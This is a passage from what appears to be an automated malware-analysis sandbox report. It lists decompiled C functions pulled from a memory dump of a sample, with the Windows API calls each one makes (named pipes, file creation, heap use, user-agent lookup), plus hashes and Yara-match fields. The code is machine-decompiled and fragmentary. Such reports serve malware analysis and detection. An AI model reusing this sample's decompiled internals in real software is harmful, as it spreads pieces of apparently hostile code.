				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x12af8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x00082c9e
0x00082ca0
0x00082ca3
0x00082ca9
0x00082cb2
0x00082d36
0x00082d3b
0x00082d3c
0x00082d3e
0x00082d8f
0x00082d40
0x00082d46
0x00082d50
0x00082d55
0x00082d5a
0x00082d5d
0x00082d5e
0x00082d63
0x00082d64
0x00082d65
0x00082d6c
0x00082d6d
0x00082d7a
0x00082d80
0x00082d85
0x00082cb4
0x00082cb9
0x00082cbe
0x00082ccc
0x00082cd0
0x00082cd5
0x00082cdb
0x00082cdd
0x00082ced
0x00082cf2
0x00082cf7
0x00082cfa
0x00082cfb
0x00082d00
0x00082d01
0x00082d02
0x00082d0f
0x00082d15
0x00082cdf
0x00082ce4
0x00082ce4
0x00082d21
0x00082d26
0x00082d93
0x00082d96
0x00082d9d
0x00082da1
0x00082da9
0x00082dbc
0x00082dc1
0x00082dc5
0x00082da9
0x00082dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
Opcode Fuzzy Hash: 7c4a0f093625b4fcaa1e26c862cc05219dd604dd7efe2f6a97326133e3ac1df4
Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xf0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x12af8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000831c2
0x000831c8
0x000831d8
0x000831dd
0x000831df
0x000831e4
0x000831f5
0x000831fa
0x00083200
0x00083202
0x0008320b
0x00083210
0x00083213
0x00083215
0x00083217
0x00083219
0x0008321a
0x0008321a
0x00083227
0x0008322a
0x0008322f
0x00083249
0x0008324f
0x00083254
0x00083257
0x00083263
0x00083271
0x00083278
0x0008327a
0x00000000
0x00000000
0x0008327c
0x00083287
0x0008328a
0x00000000
0x00083259
0x00083259
0x0008325f
0x0008328c
0x0008328c
0x0008328d
0x00083293
0x00000000
0x0008329c
0x00083257
0x00083204
0x00000000
0x00083204
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
Opcode Fuzzy Hash: 6bab0573e060300c16f750c3d2d8a24a33e2e11bb09ca3b5967ac9be5f3208f7
Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751

Uniqueness

Uniqueness Score: -1.00%

Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xf0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xf0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

0x00085aff
0x00085aff
0x00085b0a
0x00085b0c
0x00085b12
0x00085b18
0x00085b22
0x00085b2b
0x00085b36
0x00085b41
0x00085b47
0x00085b4f
0x00085b4f
0x00085b55
0x00085b5b
0x00085b5e
0x00085b69
0x00085b71
0x00085b73
0x00085b78
0x00085b98
0x00085b9f
0x00000000
0x00085ba1
0x00085ba1
0x00085ba1
0x00085b7a
0x00085b7a
0x00085b7c
0x00085b80
0x00000000
0x00085b82
0x00085b82
0x00085b85
0x00085b8b
0x00085b8e
0x00000000
0x00085b90
0x00000000
0x00085b90
0x00000000
0x00085b8e
0x00085b96
0x00085ba6
0x00085ba8
0x00000000
0x00000000
0x00000000
0x00085b96
0x00085b80
0x00085bad
0x00085bb0
0x00085bb8
0x00085bc3

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

GetDriveTypeW.KERNELBASE(?), ref: 00085B4F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x1400870
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x1400870
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x0008e453
0x0008e454
0x0008e45c
0x0008e4a6
0x0008e4b3
0x0008e4b8
0x00000000
0x0008e45e
0x0008e463
0x0008e46a
0x0008e473
0x0008e47a
0x0008e481
0x0008e485
0x0008e4bd
0x0008e4c0
0x0008e487
0x0008e499
0x0008e499
0x0008e485

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481

Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
Opcode Fuzzy Hash: fadecc4150335b3d5cba4393e5bf78e676c03b8a8521bdaa611949d1b81c303c
Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715

Uniqueness

Uniqueness Score: -1.00%

Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x0008a65c
0x0008a65f
0x0008a660
0x0008a663
0x0008a665
0x0008a668
0x0008a66d
0x0008a69e
0x0008a6a0
0x0008a66f
0x0008a66f
0x0008a66f
0x0008a691
0x00000000
0x00000000
0x0008a693
0x0008a696
0x0008a69c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0008a69c
0x0008a6a5
0x0008a6a5
0x0008a6a1
0x0008a6a4

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1

Uniqueness

Uniqueness Score: -1.00%

Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x0008a601
0x0008a615
0x0008a61a
0x0008a623
0x0008a625
0x0008a62f
0x0008a62f
0x00000000
0x0008a635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371

Uniqueness

Uniqueness Score: -1.00%

Function 00083017, Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00083017() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0x9e688; // 0xf0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E0008BB20(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
						return 0;
					}
				}
			}

0x00083017
0x00083023
0x0008304e
0x00083051
0x00083025
0x00083025
0x0008302c
0x00000000
0x0008302e
0x00083033
0x00083039
0x00083045
0x0008304d
0x0008304d
0x0008302c

APIs

AllocConsole.KERNEL32 ref: 00083033

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocConsole
String ID:
API String ID: 4167703944-0
Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}

0x0008a64f
0x0008a652
0x0008a657
0x0008a65b

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720

Uniqueness

Uniqueness Score: -1.00%

Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}

0x00088612
0x00088619

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82

Uniqueness

Uniqueness Score: -1.00%

Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}

0x0008b27c

APIs

GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00

Uniqueness

Uniqueness Score: -1.00%

Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}

0x000885f8
0x000885fe
0x00088603

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x12afd20
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4)));
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x12afd20
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xf0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xf0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x12afd20
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x12afd20
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xf0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x12afd20
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0);
				}
				return 0;
			}

0x0008f9c5
0x0008f9cd
0x0008f9d2
0x0008f9d8
0x0008f9de
0x0008f9f1
0x0008f9fb
0x0008fa05
0x0008fa08
0x0008fa0d
0x0008fa23
0x0008fa27
0x0008fa2c
0x0008fa2d
0x0008fa2e
0x0008fa33
0x0008fa36
0x0008fa37
0x0008fa38
0x0008fa3d
0x0008fa4c
0x0008fa51
0x0008fa56
0x0008fa5d
0x0008fa66
0x0008fa6b
0x0008fa6e
0x0008fa71
0x0008fa76
0x0008fa7c
0x0008fa81
0x0008fa86
0x0008fa89
0x0008fa9c
0x0008faa1
0x0008faa4
0x0008faa4
0x0008faac
0x0008fab7
0x0008fabc
0x0008fabf
0x0008fac2
0x0008fac2
0x0008fac8
0x0008faca
0x0008face
0x0008fad9
0x0008fade
0x0008fae3
0x00000000
0x00000000
0x0008faec
0x0008faf2
0x0008faf9
0x0008fafb
0x0008fafe
0x00000000
0x0008fafe
0x00000000
0x0008faf9
0x0008fb0b
0x0008fb14
0x0008fb18

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
Opcode Fuzzy Hash: 1f9757d0e137bd40863a7303ae008b135da7446a92f1e42c8074acf2507c4f46
Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008896F, Relevance: 1.4, APIs: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0008896F(WCHAR* __ecx, short __edx, intOrPtr _a4, short _a8) {
				char _v8;
				WCHAR* _v12;
				signed int _v16;
				WCHAR* _v20;
				short _t30;
				short _t33;
				intOrPtr _t38;
				intOrPtr _t43;
				intOrPtr _t45;
				short _t49;
				void* _t52;
				char _t71;
				WCHAR* _t72;

				_v16 = _v16 & 0x00000000;
				_t71 = 0;
				_v12 = __ecx;
				_t49 = __edx;
				_v8 = 0;
				_t72 = E00088604(0x448);
				_v20 = _t72;
				_pop(_t52);
				if(_t72 != 0) {
					_t72[0x21a] = __edx;
					_t72[0x21c] = _a8;
					lstrcpynW(_t72, _v12, 0x200);
					if(_t49 != 1) {
						_t30 = E00088604(0x100000);
						_t72[0x212] = _t30;
						if(_t30 != 0) {
							_t69 = _a4;
							_t72[0x216] = 0x100000;
							if(_a4 != 0) {
								E000887EA(_t72, _t69);
							}
							L16:
							return _t72;
						}
						L7:
						if(_t71 != 0) {
							E0008861A( &_v8, 0);
						}
						L9:
						_t33 = _t72[0x218];
						if(_t33 != 0) {
							_t38 =  *0x9e684; // 0x12af8f0
							 *((intOrPtr*)(_t38 + 0x30))(_t33);
						}
						_t73 =  &(_t72[0x212]);
						if(_t72[0x212] != 0) {
							E0008861A(_t73, 0);
						}
						E0008861A( &_v20, 0);
						goto L1;
					}
					_t43 = E0008A6A9(_t52, _v12,  &_v16); // executed
					_t71 = _t43;
					_v8 = _t71;
					if(_t71 == 0) {
						goto L9;
					}
					if(E00088815(_t72, _t71, _v16, _a4) < 0) {
						goto L7;
					} else {
						_t45 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t45 + 0x30))(_t72[0x218]);
						_t72[0x218] = _t72[0x218] & 0x00000000;
						E0008861A( &_v8, 0);
						goto L16;
					}
				}
				L1:
				return 0;
			}

0x00088975
0x0008897c
0x0008897e
0x00088986
0x00088988
0x00088990
0x00088992
0x00088995
0x00088998
0x000889ac
0x000889b3
0x000889b9
0x000889c2
0x00088a1a
0x00088a1f
0x00088a28
0x00088a75
0x00088a78
0x00088a80
0x00088a84
0x00088a84
0x00088a89
0x00000000
0x00088a89
0x00088a2a
0x00088a2c
0x00088a34
0x00088a3a
0x00088a3b
0x00088a3b
0x00088a43
0x00088a46
0x00088a4b
0x00088a4b
0x00088a4e
0x00088a57
0x00088a5c
0x00088a62
0x00088a69
0x00000000
0x00088a6f
0x000889cb
0x000889d0
0x000889d2
0x000889d9
0x00000000
0x00000000
0x000889ee
0x00000000
0x000889f0
0x000889f0
0x000889fb
0x000889fe
0x00088a0b
0x00000000
0x00088a11
0x000889ee
0x0008899a
0x00000000

APIs

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

lstrcpynW.KERNEL32(00000000,00000000,00000200,00000000,00000000,00000003), ref: 000889B9

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeaplstrcpyn
String ID:
